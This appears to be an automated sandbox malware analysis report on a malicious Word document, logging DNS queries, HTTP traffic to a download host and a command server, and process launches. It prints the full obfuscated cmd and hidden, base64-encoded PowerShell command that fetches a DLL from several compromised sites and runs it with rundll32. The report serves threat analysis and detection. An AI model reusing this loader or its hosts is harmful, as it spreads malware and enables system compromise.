                                    Jan 25, 2021 11:20:43.660578966 CET5219753192.168.2.228.8.8.8
                                    Jan 25, 2021 11:20:43.692176104 CET53521978.8.8.8192.168.2.22

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jan 25, 2021 11:20:43.660578966 CET192.168.2.228.8.8.80xfc39Standard query (0)nadysa.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jan 25, 2021 11:20:43.692176104 CET8.8.8.8192.168.2.220xfc39No error (0)nadysa.com217.144.106.11A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • nadysa.com
                                    • 84.232.229.24

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249165217.144.106.1180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 25, 2021 11:20:43.855108976 CET0OUTGET /wp-content/Almet/ HTTP/1.1
                                    Host: nadysa.com
                                    Connection: Keep-Alive
                                    Jan 25, 2021 11:20:44.006011009 CET1INHTTP/1.1 200 OK
                                    set-cookie: 600e9b7be6c9d=1611570043; expires=Mon, 25-Jan-2021 10:21:43 GMT; Max-Age=60; path=/
                                    cache-control: no-cache, must-revalidate
                                    pragma: no-cache
                                    last-modified: Mon, 25 Jan 2021 10:20:43 GMT
                                    expires: Mon, 25 Jan 2021 10:20:43 GMT
                                    content-type: application/octet-stream
                                    content-disposition: attachment; filename="FVuZwepQsUwldyAWc.dll"
                                    content-transfer-encoding: binary
                                    transfer-encoding: chunked
                                    date: Mon, 25 Jan 2021 10:20:43 GMT
                                    server: LiteSpeed
                                    connection: Keep-Alive
                                    Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 89 46 0b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 12 05 00 00 00 00 00 50 19 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 a7 c7 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 05 00 58 15 00 00 00 c0 05 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 57 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 9c 05 05 00 00 70 00 00 00 06 05 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 a0 05 00 00 02 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 b0 05 00 00 02 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 c0 05 00 00 04 00 00 00 50 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`dTXa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8dH @.text7dJ @.text6dL @.text5dN @.relocP@B


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.224916684.232.229.2480C:\Windows\SysWOW64\rundll32.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 25, 2021 11:21:50.546128035 CET435OUTPOST /v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/ HTTP/1.1
                                    DNT: 0
                                    Referer: 84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/
                                    Content-Type: multipart/form-data; boundary=--------------9AYnZdeXqkvt9n
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 84.232.229.24
                                    Content-Length: 5972
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Jan 25, 2021 11:21:50.998769999 CET443INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Mon, 25 Jan 2021 10:21:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    Data Raw: 66 66 34 0d 0a b6 db 56 64 a5 b6 a1 89 67 d0 d9 b1 ee 3a a1 64 b3 71 5b fa 5d 39 e5 10 75 b3 4c 3c c7 15 83 84 0c 24 bd d8 11 42 74 1a 56 df a6 b0 99 36 49 73 c3 da 14 43 a0 41 67 33 16 f7 57 df bc 6d af b1 f7 7e ec dd 30 f8 48 13 73 31 93 f5 f0 8b 45 1a dd 26 1a a6 e3 56 f7 69 4b 7c ee 2a 99 bd 67 4d 38 ee 9f 31 6a 39 fe 94 ea aa 91 da da 4e bd 07 4d 7b 45 9f 56 12 6a a1 8b 4d 5b 79 ee 3d 2d 43 f2 c8 a4 0d 93 3f 85 a8 2d 6e c6 49 53 06 09 b5 3c f8 3b 47 26 f7 66 83 65 ab 00 fa 53 37 08 4e 7c 48 78 a7 3d 89 da 2f b1 3d 5c 56 9c d4 94 60 2c 59 97 41 5d c8 35 1e be f2 3e 58 03 1d 2e ff 31 86 1f 22 05 49 37 90 72 6b 68 02 42 15 63 1f c9 e3 76 18 ec 69 f4 e3 ed 0c 03 f5 0d 94 57 59 bc 58 e7 aa f0 50 5d 4a 14 aa 48 6b 62 46 55 5a a5 48 7f 43 37 2f c0 d5 b5 ad 7a 62 a3 40 84 a9 6d 9e 3a 7e 63 9d cb e7 45 fd f5 f4 c7 e4 94 68 4d 76 69 d6 0f d6 95 e1 c2 40 6c 8b da 99 c7 0b fd 02 32 2c 9c d7 9b e1 17 97 eb 29 ca b1 e2 f4 34 4d 6c 8b 57 08 f4 8c 8e 94 a9 27 bb 1c f0 ae 7f 83 c6 00 49 18 0d 30 7f af 50 a0 aa 9e 35 e3 9a f6 54 a7 49 16 7d 62 b1 9d 93 41 ff 2c ac 1e c2 85 58 7c 75 bd 19 a5 9e cf fa 9a 2e e5 58 2f e3 a6 d4 8b cd 72 16 f5 a6 51 ce 6a 66 dc e8 98 2f db 82 05 3e 8f cc d8 23 89 1c 56 93 ed bb 4e 60 bd fe af 07 8c d0 35 74 a4 b6 24 a5 11 69 e3 73 88 46 e3 7e 71 db ee 6d 39 60 be 87 68 a4 c0 09 6a 29 ab 26 37 2d ca 4d 44 a8 57 3e 20 c1 e3 18 cd c4 56 36 00 7d d7 ca 20 64 48 f6 be b2 d0 d8 ab b8 c2 bc fb fc 83 b7 3e 86 9f 4d 7b 46 6b aa f4 ec 05 f7 81 f6 24 d3 56 bd d7 f4 c6 12 dc 63 2e de fa 9e c9 9c 05 a7 6c 97 96 de c7 d3 9c 40 58 f0 c3 8d a2 17 00 df 4d 92 e5 85 50 d2 ba 11 ba df 91 ab 71 34 82 ea f3 3d b6 6f 59 f2 1d 03 72 02 ec 57 cf d0 40 f3 7e 6b 46 67 45 b1 50 e2 3b f6 4c e0 91 63 f3 70 e8 e7 7e 9e 56 4e 3b 68 6b 5a 58 4c dd 89 87 52 8e 01 2f 2d db 82 19 3c f5 0b a4 05 6c 78 da 90 32 02 1a 51 c3 5c 81 ab 71 0e 74 26 d6 5c d1 cd 6e 43 7f b3 c7 8c 10 cf 63 42 e9 7c 78 d6 93 3e bb aa ff b2 3f de 97 bd 06 83 4f 20 0c 20 a9 38 ef 3f f8 6b 6d 9e b4 a4 55 d1 90 cf 2f 5f 7c bc e0 cf 08 fd 82 2c e3 cd cb 0a 41 26 2f 86 70 2f 0b 26 d8 eb 7f 3e 9f 9e ea 4a 62 f5 16 9c c6 ce cf e9 45 e3 ca 0c e3 fb df 68 fb a8 88 15 f3 42 58 5d 4b 32 62 c6 2e 40 96 84 b3 a0 c9 16 22 ed fe d7 03 1b 7f a2 b1 4c a6 f5 71 d3 38 89 f0 9c 34 26 c3 db c5 ff 0c a6 6d d0 c9 34 60 17 41 d7 eb bc 77 bf d0 72 4a ba 4f d5 15 e1 9d 19 8b 55 bf 77 22 98 39 d1 57 0f cd 51 1e 6b a3 c8 bd 9e 82 37 0a 9c e0 52 5e aa a7 12 f6 4a ec 31 1d a4 13 64 e0 d4 40 da 71 57 9f 04 5c 80 4f 99 64 6a 84 a7 ee cf 7a a7 75 45 d5 4b f0 fe 7a 8d ba 58 c1 8f 38 b7 ee ce 30 56 fb d0 14 44 91 bd a8 db 97 e2 dc 53 3d 26 ac b4 3c dc e4 07 34 49 be 36 2a 21 d7 af 71 69 d4 73 ee 70 3c a1 21 63 fa f7 0b 6d 75 dc e8 12 b7 6f ba 98 d8 a2 93 79 71 74 6f 9e e2 2a 41 43 b6 4e 3e 0e 2a 8d a0 25 60 d7 6e 9a 3a 8e fd 55 f2 61 7a f3 d1 b8 05 96 fe cc f6 15 d8 08 81 01 10 10 58 51 a5 8c 94 6e 14 b9 c0 e9 e2 fb c1 33 5d 13 0f db bf af c7 84 e0 c6 13 78 c4 99 b7 63 97 f7 6b ee a9 8d 98 5b 2c 4f d5 0b 4b e0 0b b5 25 88 02 ac 93 b5 29 62 0b ef 80 e4 d5 ab 42 b3 93 ef fe 85 32 7e dd b9 5f f2 ee dc ee fa fc 2f c9 08 bc 6e 10 1a 0a 19 a5 25 1b a9 29 2d c0 e4 02 bf a5 ae e8 3d 62 8d b0 50 a3 19 2c 59 c3 6b 31 98 c6 7f 5f 1f 3e f5 2d 97 71 2c 62 1a 8b c7 a1 3f 5d 29 08 70 3c 67 5a 31 e6 60 86 36 83 8d 20 bb bf 38 8c 0a 33 ea 8a 4d 32 a4 08 5f ee 57 a2 41 a2 22 07 2d fa 3c 2a da 40 64 99 b3 66 29 9a 1f 55 0e 76 7f 3b 44 30 3f 96 f9 8d 24 ac 11 5e e2 3e d9 2f d5 c0 99 88 fa 32 fd
                                    Data Ascii: ff4Vdg:dq[]9uL<$BtV6IsCAg3Wm~0Hs1E&ViK|*gM81j9NM{EVjM[y=-C?-nIS<;G&feS7N|Hx=/=\V`,YA]5>X.1"I7rkhBcviWYXP]JHkbFUZHC7/zb@m:~cEhMvi@l2,)4MlW'I0P5TI}bA,X|u.X/rQjf/>#VN`5t$isF~qm9`hj)&7-MDW> V6} dH>M{Fk$Vc.l@XMPq4=oYrW@~kFgEP;Lcp~VN;hkZXLR/-<lx2Q\qt&\nCcB|x>?O 8?kmU/_|,A&/p/&>JbEhBX]K2b.@"Lq84&m4`AwrJOUw"9WQk7R^J1d@qW\OdjzuEKzX80VDS=&<4I6*!qisp<!cmuoyqto*ACN>*%`n:UazXQn3]xck[,OK%)bB2~_/n%)-=bP,Yk1_>-q,b?])p<gZ1`6 83M2_WA"-<*@df)Uv;D0?$^>/2


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:11:20:33
                                    Start date:25/01/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                    Imagebase:0x13f5a0000
                                    File size:1424032 bytes
                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:11:20:35
                                    Start date:25/01/2021
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA=
                                    Imagebase:0x4a1c0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:11:20:35
                                    Start date:25/01/2021
                                    Path:C:\Windows\System32\msg.exe
                                    Wow64 process (32bit):false
                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                    Imagebase:0xffd00000
                                    File size:26112 bytes
                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:11:20:36
                                    Start date:25/01/2021
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAK